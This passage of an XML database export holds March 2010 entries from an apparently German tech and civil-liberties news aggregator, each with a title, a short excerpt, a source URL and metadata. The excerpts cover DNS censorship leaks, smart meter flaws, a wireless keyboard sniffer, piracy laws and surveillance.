government.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Problems with a root DNS Server in China caused computers in the United
States and Chile to come under the control of the Great Firewall of
China, resulting in requests to sites such as Facebook, Twitter and
YouTube to be redirect to Chinese servers. Once the server, operated
by the Swedish service provider Netnod, was disconnected from the
Internet, the problem was resolved. The problem was first noticed by
NIC Chile, that noticed that several ISPs were providing faulty DNS
information. China uses DNS to enforce its Great Firewall and somehow
the affected ISPs were using this DNS information. Netnod claims that
their server did not contain the faulty data that redirected traffic and
security experts believe that it must have been altered by the Chinese
government.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.computerworld.com/s/article/9174278/After_DNS_problem_Chinese_root_server_is_shut_down</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/dns-error-extends-great-firewall-of-china.png</field><field type="SlugField" name="slug">dns-error-extends-great-firewall-of-china</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 22:27:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">china greatfirewall</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="5"></object></field></object><object pk="57" model="submitter.newsentry"><field type="CharField" name="title">Security Flaws Found in Smart Meters</field><field type="TextField" name="excerpt">A security researcher, Joshua Wright of InGuardians, has identified a
number of security vulnerabilities with the smart meters a number of US
utilities are rolling out to their customers. The vulnerabilities,
which could be exploited remotely via wireless technology or by
physically tampering with the meter, include the ability to ramp up
peoples' bills and to shut off their power. The research, which was
commissioned by a three power utility companies, discovered
vulnerabilities in all five of the makers of meters submitted for
testing. So far eight million smart power meters have been installed
within the United States with that number reaching 60 million by 2020.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;A security researcher, Joshua Wright of InGuardians, has identified a
number of security vulnerabilities with the smart meters a number of US
utilities are rolling out to their customers. The vulnerabilities,
which could be exploited remotely via wireless technology or by
physically tampering with the meter, include the ability to ramp up
peoples' bills and to shut off their power. The research, which was
commissioned by a three power utility companies, discovered
vulnerabilities in all five of the makers of meters submitted for
testing. So far eight million smart power meters have been installed
within the United States with that number reaching 60 million by 2020.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.syracuse.com/news/index.ssf/2010/03/smart_utility_meters_have_secu.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/security-flaws-found-in-smart-meters.png</field><field type="SlugField" name="slug">security-flaws-found-in-smart-meters</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 22:23:47</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">power smartmeter</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="9"></object></field></object><object pk="56" model="submitter.newsentry"><field type="CharField" name="title">heise online - Italien: Amtliche Präferenz für Open Source ist rechtmäßig</field><field type="TextField" name="excerpt">Verfassungsgericht vs. Regierung in Italien
Ein Urteil (in italienisch) des italienischen Verfassungsgerichts hat ein im Piemont erlassenes Gesetz bestätigt, das eine generelle Bevorzugung freier und quelloffener Software bei Beschaffungen der öffentlichen Hand vorschreibt. Gegen diese im März 2009 erlassene Richtlinie hatte die italienische Regierung geklagt, da sie wettbewerbsfeindlich sei, berichtet das Open Source Observatory and Repository (OSOR) der EU.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Verfassungsgericht vs. Regierung in Italien
Ein Urteil (in italienisch) des italienischen Verfassungsgerichts hat ein im Piemont erlassenes Gesetz bestätigt, das eine generelle Bevorzugung freier und quelloffener Software bei Beschaffungen der öffentlichen Hand vorschreibt. Gegen diese im März 2009 erlassene Richtlinie hatte die italienische Regierung geklagt, da sie wettbewerbsfeindlich sei, berichtet das Open Source Observatory and Repository (OSOR) der EU.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Italien-Amtliche-Praeferenz-fuer-Open-Source-ist-rechtmaessig-967579.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/heise-online-italien-amtliche-praferenz-fur-ope.png</field><field type="SlugField" name="slug">heise-online-italien-amtliche-praferenz-fur-ope</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 20:44:29</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">foss</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="55" model="submitter.newsentry"><field type="CharField" name="title">Solaris only 90 days trial</field><field type="TextField" name="excerpt">Solaris 10, the official stable version of Sun's UNIX operating system, is no longer available to users at no cost. Oracle has adjusted the terms of the license, which now requires users to purchase a service contract in order to use the software.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Solaris 10, the official stable version of Sun's UNIX operating system, is no longer available to users at no cost. Oracle has adjusted the terms of the license, which now requires users to purchase a service contract in order to use the software.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/open-source/news/2010/03/solaris-10-no-longer-free-as-in-beer-now-a-90-day-trial.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/solaris-only-90-days-trial.png</field><field type="SlugField" name="slug">solaris-only-90-days-trial</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 15:31:29</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">oracle solaris sun</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="54" model="submitter.newsentry"><field type="CharField" name="title">Umfang der Zensur von Suchergebnissen auf Google.de - SISTRIX Suchmaschinen- &amp;amp; SEO-Blog</field><field type="TextField" name="excerpt">Von 1.000.000 Keywords habe ich bei 6.017 Keywords so einen Hinweis gefunden - das sind immerhin 0,6 Prozent der Suchanfragen, bei denen Google.de andere Ergebnisse ausliefert als Google.com (auch, wenn google.com auf Deutsch gestellt ist). Schaut man sich die betreffenden Keywords etwas genauer an, so handelt es sich bei rund 90% um Begriffe aus dem Erotikbereich (youporn, blowjob, geile omas), etwa 5% sind ewiggestrige Nazi-Spinner (hitlerjungen, kriegslieder, rudolf hess) und die restlichen 5% sind Suchbegriffe, bei denen Domains aus den ersten zwei Kategorien durch Zufall ranken.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Von 1.000.000 Keywords habe ich bei 6.017 Keywords so einen Hinweis gefunden - das sind immerhin 0,6 Prozent der Suchanfragen, bei denen Google.de andere Ergebnisse ausliefert als Google.com (auch, wenn google.com auf Deutsch gestellt ist). Schaut man sich die betreffenden Keywords etwas genauer an, so handelt es sich bei rund 90% um Begriffe aus dem Erotikbereich (youporn, blowjob, geile omas), etwa 5% sind ewiggestrige Nazi-Spinner (hitlerjungen, kriegslieder, rudolf hess) und die restlichen 5% sind Suchbegriffe, bei denen Domains aus den ersten zwei Kategorien durch Zufall ranken.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.sistrix.de/news/938-umfang-der-zensur-von-suchergebnissen-auf-google.de.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/umfang-der-zensur-von-suchergebnissen-auf-googled.png</field><field type="SlugField" name="slug">umfang-der-zensur-von-suchergebnissen-auf-googled</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 15:29:26</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">censorship google</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="53" model="submitter.newsentry"><field type="CharField" name="title">DARPA Bounces Smart Radar Off Buildings To Track Individual Urban Vehicles From the Sky | Popular Science</field><field type="TextField" name="excerpt">Tracking from Above It's difficult to use radar in urban environments because of all the structures that get in the way. But by bouncing highly sensitive radar off of buildings' facades, DARPA hopes to lock onto individual vehicles from UAVs and track them through urban streets even when buildings block line of sight.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Tracking from Above It's difficult to use radar in urban environments because of all the structures that get in the way. But by bouncing highly sensitive radar off of buildings' facades, DARPA hopes to lock onto individual vehicles from UAVs and track them through urban streets even when buildings block line of sight.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.popsci.com/technology/article/2010-03/darpas-street-level-radar-sees-around-corners-track-vehicles-sky</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/darpa-bounces-smart-radar-off-buildings-to-track-i_.png</field><field type="SlugField" name="slug">darpa-bounces-smart-radar-off-buildings-to-track-i</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 11:37:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">darpa radar tracking</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="52" model="submitter.newsentry"><field type="CharField" name="title">Ukrainian hacker liable in SEC insider trading case</field><field type="TextField" name="excerpt">The U.S. Securities and Exchange Commission had accused Oleksandr Dorozhko of gaining access to material nonpublic information about IMS Health Inc's third-quarter 2007 earnings by infiltrating the computer network of Thomson Financial. IMS had planned to announce negative earnings after the market closed that day.
Minutes after the hack and just before IMS's earnings release, Dorozhko purchased 630 put options on IMS's common stock, the SEC said in a statement.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The U.S. Securities and Exchange Commission had accused Oleksandr Dorozhko of gaining access to material nonpublic information about IMS Health Inc's third-quarter 2007 earnings by infiltrating the computer network of Thomson Financial. IMS had planned to announce negative earnings after the market closed that day.
&lt;/p&gt;
&lt;p&gt;Minutes after the hack and just before IMS's earnings release, Dorozhko purchased 630 put options on IMS's common stock, the SEC said in a statement.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.reuters.com/article/idUSN2910772020100329</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/ukrainian-hacker-liable-in-sec-insider-trading-cas.png</field><field type="SlugField" name="slug">ukrainian-hacker-liable-in-sec-insider-trading-cas</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 11:32:38</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">blackhat</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="51" model="submitter.newsentry"><field type="CharField" name="title">Google, Microsoft to team up on privacy push launching tomorrow</field><field type="TextField" name="excerpt">The worlds biggest tech heavyweights are set to team up with each other to influence the future of Internet privacy law. Google, Microsoft and a number of other civil liberties groups, think tanks and tech companies will unveil a set of principles they want to advocate for updating the (http://en.wikipedia.org/wiki/Electronic%20Communications%20Privacy%20Act) Electronic Communications Privacy Act tomorrow.
Thats a law created in 1986 that sets out the kinds of privacy rights people can expect to have when they use phones and computers. It would also cover government access to data that citizens entrust to companies like Google or Facebook.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The worlds biggest tech heavyweights are set to team up with each other to influence the future of Internet privacy law. Google, Microsoft and a number of other civil liberties groups, think tanks and tech companies will unveil a set of principles they want to advocate for updating the (http://en.wikipedia.org/wiki/Electronic%20Communications%20Privacy%20Act) Electronic Communications Privacy Act tomorrow.
&lt;/p&gt;
&lt;p&gt;Thats a law created in 1986 that sets out the kinds of privacy rights people can expect to have when they use phones and computers. It would also cover government access to data that citizens entrust to companies like Google or Facebook.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://digital.venturebeat.com/2010/03/29/google-microsoft-privacy/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/no_page_shot.png</field><field type="SlugField" name="slug">google-microsoft-to-team-up-on-privacy-push-launc</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 11:29:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">google microsoft privacy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="50" model="submitter.newsentry"><field type="CharField" name="title">heise online - Sony sperrt Linux von der PS3 aus</field><field type="TextField" name="excerpt">Sony Computer Entertainment hat für den 1. April ein Firmware-Update auf Version 3.21 für die Playstation 3 angekündigt. Doch statt neuer Funktionen hinzuzufügen, soll die Unterstützung des Linux-Betriebssystems der ältereren Konsolenmodelle entfernt werden. Als Grund gibt Charlotte Panther, PR-Chefin von Sony Computer Entertainment Europe, Sicherheitsbedenken an, die offensichtlich von der Überwindung des Hypervisors durch George Hotz Ende Januar herrühren.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Sony Computer Entertainment hat für den 1. April ein Firmware-Update auf Version 3.21 für die Playstation 3 angekündigt. Doch statt neuer Funktionen hinzuzufügen, soll die Unterstützung des Linux-Betriebssystems der ältereren Konsolenmodelle entfernt werden. Als Grund gibt Charlotte Panther, PR-Chefin von Sony Computer Entertainment Europe, Sicherheitsbedenken an, die offensichtlich von der Überwindung des Hypervisors durch George Hotz Ende Januar herrühren.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Sony-sperrt-Linux-von-der-PS3-aus-965852.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/30/heise-online-sony-sperrt-linux-von-der-ps3-aus.png</field><field type="SlugField" name="slug">heise-online-sony-sperrt-linux-von-der-ps3-aus</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-30 11:07:11</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">linux ps3 sony</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="49" model="submitter.newsentry"><field type="CharField" name="title">Sächsische Zeitung [online] - Sachsen: Sachsens Polizeidrohnen droht die Bruchlandung</field><field type="TextField" name="excerpt"># Bisher ganze 18 Einsätze
Der Grund: Statt für Erfolgsmeldungen sorgt das Projekt vielmehr für ständigen Ärger und Kritik. So dauerte es zunächst ein Vierteljahr, bis eine für zwölf Monate angemietete Flugdrohne erstmals unter Einsatzbedingungen aufsteigen konnte. Leihgebühren (76000 Euro) und die Anschaffung von Technik zur Auswertung der geplanten Luftaufnahmen (22000 Euro) hielten die Kosten dennoch extrem hoch. Später haderte man wiederum mit der Bedienung des komplizierten Fluggeräts Abstürze und Zusammenstöße inklusive. Ans Aufgeben denkt der Freistaat trotzdem nicht, im Gegenteil. Mit dem Verweis, dass die bisher getestete Drohne zu leicht sei, wurde im vergangenen Jahr mit der MD 4-1000 ein schwereres Nachfolgemodell angeschafft. Für das werden seitdem jeden Monat 2380 Euro Leasinggebühren fällig. Aber auch hier sind die Ergebnisse eher mager. Auf Anfrage der SPD-Landtagsabgeordneten Sabine Friedel musste die Staatsregierung jetzt einräumen, dass die beiden bisher getesteten Flugdrohnen lediglich 18-mal eingesetzt worden sind während eines Zeitraums von mehr als zwei Jahren.
In ganzen zehn Fällen kamen die Drohnen letztlich bei Fußballspielen zum Einsatz. Dabei waren die Geräte eigens angeschafft worden, um der Polizei bei gewaltgefährdeten Sportereignissen eine bessere Übersicht zu verschaffen und so für mehr Sicherheit zu sorgen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;h1&gt;Bisher ganze 18 Einsätze&lt;/h1&gt;
&lt;p&gt;Der Grund: Statt für Erfolgsmeldungen sorgt das Projekt vielmehr für ständigen Ärger und Kritik. So dauerte es zunächst ein Vierteljahr, bis eine für zwölf Monate angemietete Flugdrohne erstmals unter Einsatzbedingungen aufsteigen konnte. Leihgebühren (76000 Euro) und die Anschaffung von Technik zur Auswertung der geplanten Luftaufnahmen (22000 Euro) hielten die Kosten dennoch extrem hoch. Später haderte man wiederum mit der Bedienung des komplizierten Fluggeräts Abstürze und Zusammenstöße inklusive. Ans Aufgeben denkt der Freistaat trotzdem nicht, im Gegenteil. Mit dem Verweis, dass die bisher getestete Drohne zu leicht sei, wurde im vergangenen Jahr mit der MD 4-1000 ein schwereres Nachfolgemodell angeschafft. Für das werden seitdem jeden Monat 2380 Euro Leasinggebühren fällig. Aber auch hier sind die Ergebnisse eher mager. Auf Anfrage der SPD-Landtagsabgeordneten Sabine Friedel musste die Staatsregierung jetzt einräumen, dass die beiden bisher getesteten Flugdrohnen lediglich 18-mal eingesetzt worden sind während eines Zeitraums von mehr als zwei Jahren.
&lt;/p&gt;
&lt;p&gt;In ganzen zehn Fällen kamen die Drohnen letztlich bei Fußballspielen zum Einsatz. Dabei waren die Geräte eigens angeschafft worden, um der Polizei bei gewaltgefährdeten Sportereignissen eine bessere Übersicht zu verschaffen und so für mehr Sicherheit zu sorgen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.sz-online.de/nachrichten/artikel.asp?id=2423801</field><field type="FileField" name="page_screenshot">page_shots/2010/03/29/sachsische-zeitung-online-sachsen-sachsens-po.png</field><field type="SlugField" name="slug">sachsische-zeitung-online-sachsen-sachsens-po</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-29 12:46:51</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">drohne</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="48" model="submitter.newsentry"><field type="CharField" name="title">Kit attacks Microsoft keyboards (and a whole lot more) • The Register</field><field type="TextField" name="excerpt">Keykeriki version 2 captures the entire data stream sent between wireless devices using a popular series of chips made by Norway-based Nordic Semiconductor. That includes the device addresses and the raw payload being sent between them. The open-source package was developed by researchers of Switzerland-based Dreamlab Technologies and includes complete software, firmware, and schematics for building the $100 sniffer.
Keykeriki not only allows researchers or attackers to capture the entire layer 2 frames, it also allows them to send their own unauthorized payloads. That means devices that don't encrypt communications - or don't encrypt them properly - can be forced to cough up sensitive communications or be forced to execute rogue commands.
...
"Microsoft made it easy for us because they used their own proprietary crypto," Schroder said. "Xor is not a very proper way to secure data."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Keykeriki version 2 captures the entire data stream sent between wireless devices using a popular series of chips made by Norway-based Nordic Semiconductor. That includes the device addresses and the raw payload being sent between them. The open-source package was developed by researchers of Switzerland-based Dreamlab Technologies and includes complete software, firmware, and schematics for building the $100 sniffer.
&lt;/p&gt;
&lt;p&gt;Keykeriki not only allows researchers or attackers to capture the entire layer 2 frames, it also allows them to send their own unauthorized payloads. That means devices that don't encrypt communications - or don't encrypt them properly - can be forced to cough up sensitive communications or be forced to execute rogue commands.
...
"Microsoft made it easy for us because they used their own proprietary crypto," Schroder said. "Xor is not a very proper way to secure data."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/03/26/open_source_wireless_sniffer/</field><field type="FileField" name="page_screenshot">page_shots/2010/03/29/kit-attacks-microsoft-keyboards-and-a-whole-lot-m_.png</field><field type="SlugField" name="slug">kit-attacks-microsoft-keyboards-and-a-whole-lot-m</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-29 10:08:18</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">hardware sniffer</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="47" model="submitter.newsentry"><field type="CharField" name="title">8 Jahre Hausdurchsuchung dank Datenbankfehler</field><field type="TextField" name="excerpt">Embarrassed cops on Thursday cited a "computer glitch" as the reason police targeted the home of an elderly, law-abiding couple more than 50 times in futile hunts for bad guys. Apparently, the address of Walter and Rose Martin's Brooklyn home was used to test a department-wide computer system in 2002. What followed was years of cops appearing at the Martins' door looking for murderers, robbers and rapists - as often as three times a week.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Embarrassed cops on Thursday cited a "computer glitch" as the reason police targeted the home of an elderly, law-abiding couple more than 50 times in futile hunts for bad guys. Apparently, the address of Walter and Rose Martin's Brooklyn home was used to test a department-wide computer system in 2002. What followed was years of cops appearing at the Martins' door looking for murderers, robbers and rapists - as often as three times a week.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.nydailynews.com/news/2010/03/19/2010-03-19_computer_snafu_behind_repeated_raids_on_bklyn_couples_home_the_8year_glitch.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/27/8-jahre-hausdurchsuchung-dank-datenbankfehler.png</field><field type="SlugField" name="slug">8-jahre-hausdurchsuchung-dank-datenbankfehler</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-27 15:02:34</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">datenbank fail fuckup sicherheit überwachung</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="46" model="submitter.newsentry"><field type="CharField" name="title">Der erste Flughafen-Security-Fuzzy ist beim Bodyscanner-Spannen erwischt worden</field><field type="TextField" name="excerpt">Jo Margetson, 29, reported John Laker, 25, after he took her picture with the X-ray gadget and made a lewd comment. The pervy guard leered and told her: "I love those gigantic t**s." She had entered the X-ray machine by mistake - and was horrified when Laker pressed a button to take a revealing photo.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Jo Margetson, 29, reported John Laker, 25, after he took her picture with the X-ray gadget and made a lewd comment. The pervy guard leered and told her: "I love those gigantic t&lt;em&gt;&lt;/em&gt;s." She had entered the X-ray machine by mistake - and was horrified when Laker pressed a button to take a revealing photo.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.bigbrotherwatch.org.uk/home/2010/03/oh-the-irony.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/27/der-erste-flughafen-security-fuzzy-ist-beim-bodysc.png</field><field type="SlugField" name="slug">der-erste-flughafen-security-fuzzy-ist-beim-bodysc</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-27 14:59:04</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">biometrie fail nacktscanner sicherheit</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="45" model="submitter.newsentry"><field type="CharField" name="title">Sony accuses Beyonce of piracy for putting her videos on YouTube</field><field type="TextField" name="excerpt">Sony Entertainment has shut down Beyonce's official YouTube site. Congrats to Sony Entertainment for wisely spending its legal dollars and working on behalf of its artists. Truly, you deserve many laws and secret treaties passed to protect your "business model" (how else could such a delicate flower survive the harsh realities of the real world?).</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Sony Entertainment has shut down Beyonce's official YouTube site. Congrats to Sony Entertainment for wisely spending its legal dollars and working on behalf of its artists. Truly, you deserve many laws and secret treaties passed to protect your "business model" (how else could such a delicate flower survive the harsh realities of the real world?).
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.motherboard.tv/2010/3/26/beyonce-s-record-company-puts-a-ring-on-her-youtube-channel--2</field><field type="FileField" name="page_screenshot">page_shots/2010/03/27/sony-accuses-beyonce-of-piracy-for-putting-her-vid.png</field><field type="SlugField" name="slug">sony-accuses-beyonce-of-piracy-for-putting-her-vid</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-27 14:53:19</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">acta, copyright, imaginary property, music, sony, youtube</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="44" model="submitter.newsentry"><field type="CharField" name="title">Piracy up in France after tough three-strikes law passed</field><field type="TextField" name="excerpt">France's toughest-in-the-world Internet disconnection law has yet to start cutting off P2P pirates, but the "Hadopi" law has been on the books long enough to see how its provisions are altering behavior. According to a team of French researchers, online copyright infringement is down on P2P networks—but it's up in areas that the law doesn't cover, such as online streaming and one-click download services like Rapidshare.
In fact, since the law was passed, total infringing behavior has actually increased by three percent.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;France's toughest-in-the-world Internet disconnection law has yet to start cutting off P2P pirates, but the "Hadopi" law has been on the books long enough to see how its provisions are altering behavior. According to a team of French researchers, online copyright infringement is down on P2P networks—but it's up in areas that the law doesn't cover, such as online streaming and one-click download services like Rapidshare.
&lt;/p&gt;
&lt;p&gt;In fact, since the law was passed, total infringing behavior has actually increased by three percent.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/tech-policy/news/2010/03/piracy-up-in-france-after-tough-three-strikes-law-passed.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/03/26/piracy-up-in-france-after-tough-three-strikes-law.png</field><field type="SlugField" name="slug">piracy-up-in-france-after-tough-three-strikes-law</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-26 21:45:24</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">3strikes</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="43" model="submitter.newsentry"><field type="CharField" name="title">heise online - EFF zweifelt an Abhörsicherheit von SSL</field><field type="TextField" name="excerpt">So habe man beispielsweise einen Navigationsgerätehersteller dazu gebracht, zum Mitschneiden der Gespräche in einem Fahrzeug das eingebaute Mikrofon zu aktivieren. VeriSign, der größte Anbieter von SSL-Zertifikaten, sei außerdem an Geschäften zum Outsourcing von Telekommunikationsüberwachung beteiligt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;So habe man beispielsweise einen Navigationsgerätehersteller dazu gebracht, zum Mitschneiden der Gespräche in einem Fahrzeug das eingebaute Mikrofon zu aktivieren. VeriSign, der größte Anbieter von SSL-Zertifikaten, sei außerdem an Geschäften zum Outsourcing von Telekommunikationsüberwachung beteiligt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/EFF-zweifelt-an-Abhoersicherheit-von-SSL-963857.html</field><field type="FileField" name="page_screenshot">page_shots/2010/03/26/heise-online-eff-zweifelt-an-abhorsicherheit-von.png</field><field type="SlugField" name="slug">heise-online-eff-zweifelt-an-abhorsicherheit-von</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-03-26 10:21:10</field><field to="show.pentashow" name="show" rel="ManyToOneRel">2</field><field type="CharField" name="tags_string">ssl</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="42" model="submitter.newsentry"><field type="CharField" name="title">Spam kommt gut an</field><field type="TextField" name="excerpt">Die MAAWG hat ihre Studie erstmals auf europäische Länder ausgeweitet und sieht die Vorjahresergebnisse aus den USA im Wesentlichen bestätigt. Nach den Erkenntnissen der Anti-Spam-Experten haben mehr als die Hälfte (57 %) der befragten Erwachsenen ausgesagt, bereits auf Spam in einer Weise reagiert 